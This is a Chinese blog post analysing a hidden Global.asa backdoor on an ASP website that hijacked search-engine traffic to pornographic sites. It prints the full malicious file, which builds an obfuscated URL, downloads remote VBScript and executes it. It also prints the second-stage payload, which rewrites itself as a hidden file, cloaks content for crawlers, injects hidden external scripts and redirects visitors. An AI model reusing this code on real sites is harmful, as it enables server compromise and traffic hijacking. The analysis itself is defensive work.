首页 > 开发 > Asp > 正文

警惕ASP网站Global.asa导致网站被挂马或转向的解决

2019-10-20 15:23:11
字体:
来源:转载
供稿:网友

上午帮朋友处理一个比较有难度的问题,网站输入域名访问正常打开,但从搜索引擎厚度或是Google之类的打开,就会跳转到某些色情网站上去.

根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去,使用此种方法具有很强的隐匿性,因为站长们一般不会去搜索自己的网站,所以轻易不会发现自己站点遭到了挟持。

因为网站是自己很多年前帮朋友做的,所以要了现在的代码,看了一下,没有发现问题,就开始是不是服务器感染了什么病毒或是被加上了什么IIS过滤器之类的,要了远程桌面,上去找了半天,一无所获,看了一下IP地址,发现是一个内网IP地址,也就是说需要网关将网站映射发布出去,于是怀疑问题是在网关上,但问了朋友之后,得知网关为一路由器,再加上将IIS关闭,网站也就无法打开,不能再跳转,排除了网关加马的可能性。

难倒走不下去了?

忽然想到一招,采用FileMon对w3wp.exe进程进行监控,看看用搜索引擎打开和直接打开读取的文件到底有什么不同,通过多次比较,也没有发现什么疑点。

万般无奈,又回到网站根目录下,顺手打开了显示系统隐藏文件,却发现多了一个Global.asa文件,因为网站是自己做的,比较了解,根本不可能使用这个文件,打开一看,一切疑点都解决了。

Global.asa文件内容如下:

 
<script language="vbscript" runat="server">
'by_aming
'by*aming
sub Application_OnStart
end sub
 
sub Application_OnEnd
end sub
 
sub Session_OnStart
    url="h"&"t"&"t"&"p"&":"&"/"&"/"&"g"&"l"&"o"&".1"&"0"&"0"&"5"&"0"&"0"&".c"&"o"&"m"&"/x"&"m"&"l"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"a"&"s"&"a"&"q"&"u"&"a"&"n"&"."&"t"&"x"&"t"
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    GetHtml = objStream.ReadText
    objStream.Close
    if instr(GetHtml,"by*aming")>0 then
        execute GetHtml
    end if
end sub
 
'sub Session_OnEnd
'end sub
</script>

 

因为Global.asa文件为网站启动文件,当一个网站被第一次访问时,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问,从http://glo.100500.com/xml/global.asaquan.txt处下载内容,并执行,让我们来看看http://glo.100500.com/xml/global.asaquan.txt的内容是什么吧:

 

警惕ASP网站Global.asa导致网站被挂马或转向的解决代码
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c])}}return p}('0.1.2(/'3:4/');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>'by*amingServer.ScriptTimeout=600Public Function createasa(ByVal Content)    On Error Resume Next    Set fso = Server.CreateObject("scripting.filesystemobject")    set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))    f.Attributes=0    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")    Obj.Type = 2    Obj.open    Obj.Charset = "gb2312"    Obj.Position = Obj.Size    Obj.writetext = Content    Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2    Obj.Close    Set Obj = Nothing    f.Attributes=1+2+4    set f=Nothing    Set fso = Nothing End FunctionPublic Function createasax(ByVal Content)    On Error Resume Next    Set fso = Server.CreateObject("scripting.filesystemobject")    set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))    f.Attributes=0    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")    Obj.Type = 2    Obj.open    Obj.Charset = "gb2312"    Obj.Position = Obj.Size    Obj.writetext = Content    Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2    Obj.Close    Set Obj = Nothing    f.Attributes=1+2+4    set f=Nothing    Set fso = Nothing End FunctionPublic Function GetHtml(url)    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")    ObjXMLHTTP.Open "GET",url,False    ObjXMLHTTP.setRequestHeader "User-Agent",url    ObjXMLHTTP.send    GetHtml=ObjXMLHTTP.responseBody    Set ObjXMLHTTP=Nothing    set objStream = Server.CreateObject("Adodb.Stream")    objStream.Type = 1    objStream.Mode =3    objStream.Open    objStream.Write GetHtml    objStream.Position = 0    objStream.Type = 2    objStream.Charset = "gb2312"    GetHtml = objStream.ReadText    objStream.CloseEnd FunctionFunction check(user_agent)    allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")    check_agent=false    For agenti=lbound(allow_agent) to ubound(allow_agent)        If instr(user_agent,allow_agent(agenti))>0 then            check_agent=true            exit for        end if     Next    check=check_agentEnd function  Function CheckRobot()      CheckRobot = False      Dim Botlist,i,Repls      Repls      = request.ServerVariables("http_user_agent")      Krobotlist = "Baiduspider|Googlebot"      Botlist = Split(Krobotlist,"|")      For i = 0 To Ubound(Botlist)        If InStr(Repls,Botlist(i)) > 0 Then          CheckRobot = True          Exit For        End If      Next      If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1      If Session("ThisCheckRobot")   = 1   Then CheckRobot = True  End Function  Function CheckRefresh()      CheckRefresh = False      Dim Botlist,i,Repls      Krobotlist = "baidu|google|sogou|soso|youdao"      Botlist = Split(Krobotlist,"|")      For i = 0 To Ubound(Botlist)        If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then          CheckRefresh = True          Exit For        End If      Next  End FunctionSub sleep()If response.IsClientConnected=true then    Response.Flushelse    response.endend ifEnd SubIf CheckRefresh=true Then cnnbd=lcase(request.servervariables("HTTP_HOST"))'response.redirect("http://www.220550.com/?"&cnnbd&"")Response.Write("<div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=1></script><script src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script></div>")response.endend Ifuser_agent=Request.ServerVariables("HTTP_USER_AGENT")if check(user_agent)=true then    'body=GetHtml("http://html.888hhh.com/2prn.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")    body=GetHtml("http://i.bxhty.info/index.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")response.write bodyresponse.endelseasa=GetHtml("http://glo.100500.com/xml/globalquan.txt")if instr(asa,"by*aming")>0 then    createasa(asa)end ifScriptAddress=Request.ServerVariables("SCRIPT_NAME")namepath=Server.MapPath(ScriptAddress)If Len(Request.QueryString) > 0 Then    ScriptAddress = ScriptAddress & "?" & Request.QueryStringend ifgeturl ="http://"& Request.ServerVariables("http_host") & ScriptAddressgeturl =LCase(geturl)'response.write replace(namepath,server.MapPath("/"),"")'response.end'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 thenagent = lcase(request.servervariables("http_user_agent"))referer = LCase(Request.ServerVariables("HTTP_REFERER"))bot = ""Amll = ""if instr(agent, "+") > 0 then bot = agentif instr(agent, "-") > 0 then bot = agentif instr(agent, "http") > 0 then bot = agentif instr(agent, "spider") > 0 then bot = agentif instr(agent, "bot") > 0 then bot = agentif instr(agent, "linux") > 0 then bot = agentif instr(agent, "baidu") > 0 then bot = agentif instr(agent, "google") > 0 then bot = "nobot"if instr(agent, "yahoo") > 0 then bot = "nobot"if instr(agent, "msn") > 0 then bot = "nobot"if instr(agent, "alexa") > 0 then bot = "nobot"if instr(agent, "sogou") > 0 then bot = "nobot"if instr(agent, "youdao") > 0 then bot = "nobot"if instr(agent, "soso") > 0 then bot = "nobot"if instr(agent, "iask") > 0 then bot = "nobot"if bot="nobot" then'Call WriteErr'response.endend ifIf Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok"tjcount=request.Cookies("cookie_tjcount")date1=request.Cookies("cookie_date")date2=year(date)&month(date)&day(date)if tjcount="" then    response.cookies("cookie_tjcount")=0    response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())end ifif date1<>date2 then    response.cookies("cookie_date")=date2    response.cookies("cookie_date").Expires=DateAdd("d",365,now())end iftjcount=request.Cookies("cookie_tjcount")date1=request.Cookies("cookie_date")date2=year(date)&month(date)&day(date)if date1=date2 and len(bot) = 0 then    if int(tjcount)<10 and len(Amll)>0 then        response.cookies("cookie_tjcount")=int(tjcount)+1        response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())     strHost=Request.ServerVariables("HTTP_HOST")    Response.Redirect("http://www.115225.com/?domain="&strHost&"")    else        'response.write "<h1>Service Unavailable</h1>"            response.write ""        'response.write gethtml(geturl&"?global=ok")    end if    response.endend ifCall sleep()end if end if '</body></html>

 

 


 此处代码有多个函数组成:
createasa 根据传入的内容创建global.asa文件
createasax 根据传入的内容创建Global.asax文件
GetHtml 根据传入的url,获取相应的内容
check 检测user-agent判断是否为搜索引擎的蜘蛛
CheckRobot 检测是否为robot ?
CheckRefresh 检测是否Refresh

说到底这块代码的作用就是判断访问页面是否来自于搜索引擎,是的话,就将HTML:

警惕ASP网站Global.asa导致网站被挂马或转向的解决代码
<div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=1></script><script src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script></div>

 

输出去。

至此,就达到了将来自于搜索引擎流量挟持走的目的了。

解决办法也很简单,就是直接删除此文件就可以了,当然最好还是要检查一下网站,查一下为什么会被加上一个Global.asa文件

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表